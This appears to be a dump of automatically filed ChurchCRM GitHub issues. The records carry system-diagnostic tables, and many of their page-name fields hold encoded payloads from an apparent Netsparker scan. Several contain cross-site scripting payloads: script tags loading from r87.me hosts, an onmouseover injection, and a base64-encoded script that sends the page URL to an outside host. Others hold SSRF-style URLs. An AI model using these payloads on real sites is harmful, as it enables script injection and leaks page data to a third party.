Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6437/comments | 0 | 2023-01-25T07:26:01Z | 2023-02-07T08:50:35Z | https://github.com/ChurchCRM/CRM/issues/6437 | 1,556,173,162 | 6,437 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/v2/dashboard
Screen Size |600x800
Window Size |720x1259
Page Size |805x1259
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6436/comments | 0 | 2023-01-25T07:25:45Z | 2023-02-07T08:50:34Z | https://github.com/ChurchCRM/CRM/issues/6436 | 1,556,172,925 | 6,436 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/v2/family?%22%2bnetsparker(0x00A7FF)%2b%22=nsextt
Screen Size |600x800
Window Size |720x1280
Page Size |720x1280
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6435/comments | 0 | 2023-01-25T07:25:31Z | 2023-02-07T08:50:34Z | https://github.com/ChurchCRM/CRM/issues/6435 | 1,556,172,730 | 6,435 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/v2/calendar
Screen Size |600x800
Window Size |720x1259
Page Size |821x1259
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6434/comments | 0 | 2023-01-25T07:25:28Z | 2023-02-07T08:50:33Z | https://github.com/ChurchCRM/CRM/issues/6434 | 1,556,172,687 | 6,434 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/VolunteerOpportunityEditor.php?%22%2bnetsparker(0x00A79B)%2b%22
Screen Size |600x800
Window Size |720x1259
Page Size |906x1259
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6433/comments | 0 | 2023-01-25T07:25:21Z | 2023-02-07T08:50:33Z | https://github.com/ChurchCRM/CRM/issues/6433 | 1,556,172,613 | 6,433 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/PersonCustomFieldsEditor.php?%22%2bnetsparker(0x00A737)%2b%22
Screen Size |600x800
Window Size |720x1280
Page Size |720x1280
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6432/comments | 0 | 2023-01-25T07:25:05Z | 2023-02-07T08:50:32Z | https://github.com/ChurchCRM/CRM/issues/6432 | 1,556,172,278 | 6,432 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/PersonView.php?PersonID=1&issueDescription=&issueTitle=%22%2bnetsparker(0x00A6D3)%2b%22&pageName=%2fPersonView.php%3fPersonID%3d1
Screen Size |600x800
Window Size |720x1259
Page Size |814x1259
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6431/comments | 0 | 2023-01-25T07:24:37Z | 2023-02-07T08:50:32Z | https://github.com/ChurchCRM/CRM/issues/6431 | 1,556,171,322 | 6,431 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/FamilyCustomFieldsEditor.php?%22%2bnetsparker(0x00A6D0)%2b%22
Screen Size |600x800
Window Size |720x1280
Page Size |720x1280
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6430/comments | 0 | 2023-01-25T07:24:32Z | 2023-02-07T08:50:31Z | https://github.com/ChurchCRM/CRM/issues/6430 | 1,556,171,148 | 6,430 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/PeopleDashboard.php
Screen Size |600x800
Window Size |720x1259
Page Size |1748x1259
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6429/comments | 0 | 2023-01-25T07:24:31Z | 2023-02-07T08:50:31Z | https://github.com/ChurchCRM/CRM/issues/6429 | 1,556,171,092 | 6,429 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/v2/dashboard
Screen Size |600x800
Window Size |720x1259
Page Size |805x1259
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6428/comments | 0 | 2023-01-25T07:24:29Z | 2023-02-07T08:50:30Z | https://github.com/ChurchCRM/CRM/issues/6428 | 1,556,171,023 | 6,428 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/v2/person/not-found?id=0
Screen Size |600x800
Window Size |720x1280
Page Size |720x1280
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6427/comments | 0 | 2023-01-25T07:24:01Z | 2023-02-07T08:50:29Z | https://github.com/ChurchCRM/CRM/issues/6427 | 1,556,170,595 | 6,427 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/OptionManager.php?ListID=%27%22--%3e%3c%2fstyle%3e%3c%2fscRipt%3e%3cscRipt%20src%3d%22%2f%2f2xeb4dht-bvppmcde701nbroeslfusjzrcp1fdplpfe%26%2346%3br87%26%2346%3bme%22%3e%3c%2fscRipt%3e&mode=classes
Screen Size |600x800
Window Size |720x1280
Page Size |720x1280
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6426/comments | 0 | 2023-01-25T07:23:59Z | 2023-02-07T08:50:29Z | https://github.com/ChurchCRM/CRM/issues/6426 | 1,556,170,572 | 6,426 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/v2/dashboard
Screen Size |600x800
Window Size |720x1259
Page Size |805x1259
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6425/comments | 0 | 2023-01-25T07:23:40Z | 2023-02-07T08:50:28Z | https://github.com/ChurchCRM/CRM/issues/6425 | 1,556,170,299 | 6,425 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/OptionManager.php?ListID=hTTp://r87.com/?192.168.200.160/&mode=classes
Screen Size |600x800
Window Size |720x1280
Page Size |720x1280
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6424/comments | 0 | 2023-01-25T07:23:28Z | 2023-02-07T08:50:28Z | https://github.com/ChurchCRM/CRM/issues/6424 | 1,556,170,125 | 6,424 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/v2/people?familyActiveStatus=%22%3bl%3ddocument.createElement(%22link%22)%3bl.rel%3d%22prefetch%22%3bl.href%3d%22%2f%2f2xeb4dht-b877h5mphugb-smotadaocakt714otu%22%2b%22hw4.r87.me%2fr%2f%3f%22%2blocation.href%3bdocument.head.appendChild(l)%3b%2f%2f
Screen Size |600x800
Window Size |720x1280
Page Size |720x1280
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6423/comments | 0 | 2023-01-25T07:23:11Z | 2023-02-07T08:50:27Z | https://github.com/ChurchCRM/CRM/issues/6423 | 1,556,169,900 | 6,423 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/OptionManager.php?ListID=x%22%20onmouseover%3dnetsparker(0x00AD47)%20x%3d%22&mode=classes
Screen Size |600x800
Window Size |720x1280
Page Size |720x1280
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6422/comments | 0 | 2023-01-25T07:22:40Z | 2023-02-07T08:50:27Z | https://github.com/ChurchCRM/CRM/issues/6422 | 1,556,169,485 | 6,422 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/PaddleNumList.php?nsextt=%22%2bnetsparker(0x00A576)%2b%22
Screen Size |600x800
Window Size |720x1280
Page Size |720x1280
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6421/comments | 0 | 2023-01-25T07:22:37Z | 2023-02-07T08:50:26Z | https://github.com/ChurchCRM/CRM/issues/6421 | 1,556,169,450 | 6,421 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/PersonView.php?PersonID=1
Screen Size |600x800
Window Size |720x1259
Page Size |814x1259
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6420/comments | 0 | 2023-01-25T07:22:30Z | 2023-02-07T08:51:23Z | https://github.com/ChurchCRM/CRM/issues/6420 | 1,556,169,361 | 6,420 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/v2/family?issueDescription=&issueTitle=%27%22--%3e%3c%2fstyle%3e%3c%2fscRipt%3e%3cscRipt%20src%3d%22%2f%2f2xeb4dht-b3foqlgv3w2lm2vnw3f5-t9v4wd78gyxow%26%2346%3br87%26%2346%3bme%22%3e%3c%2fscRipt%3e&mode=inactive&pageName=%2fv2%2ffamily%3fmode%3dinactive
Screen Size |600x800
Window Size |720x1280
Page Size |720x1280
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6419/comments | 0 | 2023-01-25T07:21:58Z | 2023-02-07T08:51:22Z | https://github.com/ChurchCRM/CRM/issues/6419 | 1,556,168,918 | 6,419 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/v2/family?issueDescription=&issueTitle=hTTp://r87.com/?192.168.200.160/&mode=inactive&pageName=%2fv2%2ffamily%3fmode%3dinactive
Screen Size |600x800
Window Size |720x1280
Page Size |720x1280
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6418/comments | 0 | 2023-01-25T07:21:57Z | 2023-02-07T08:51:22Z | https://github.com/ChurchCRM/CRM/issues/6418 | 1,556,168,890 | 6,418 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/v2/cart
Screen Size |600x800
Window Size |720x1280
Page Size |720x1280
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_deflate,mod_dir,mod_env,mod_filter,mod_mime,prefork,mod_negotiation,mod_php7,mod_reqtimeout,mod_rewrite,mod_setenvif,mod_status | 3 | https://api.github.com/repos/ChurchCRM/CRM/issues/6417/comments | 0 | 2023-01-25T07:21:48Z | 2023-02-07T08:51:21Z | https://github.com/ChurchCRM/CRM/issues/6417 | 1,556,168,773 | 6,417 |
[
"ChurchCRM",
"CRM"
] | 208.100.0.117
Collected Value Title | Data
----------------------|----------------
Page Name |/v2/family?mode=%3cscRipt%20src%3d%22data%3a%3bbase64%2cbD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJsaW5rIik7bC5yZWw9InByZWZldGNoIjtsLmhyZWY9Ii8vMnhlYjRkaHQtYjBpZ2RndDdjZWY4dnZqZ3ZwazNwZWRieWtlcjVrcCIrImRkMC5yODcubWUvci8%2fIitsb2NhdGlvbi5ocmVmO2RvY3VtZW50LmhlYWQuYXBwZW5kQ2hpbGQobCk%3d%22%3e%3c%2fscRipt%3e
Screen Size |600x800
Window Size |720x1280
Page Size |720x1280
Platform Information | Linux ubuntu 5.4.0-137-generic #154-Ubuntu SMP Thu Jan 5 17:03:22 UTC 2023 x86_64
PHP Version | 7.4.3-4ubuntu2.17
SQL Version | 5.5.5-10.3.37-MariaDB-0ubuntu0.20.04.1
ChurchCRM Version |4.5.3
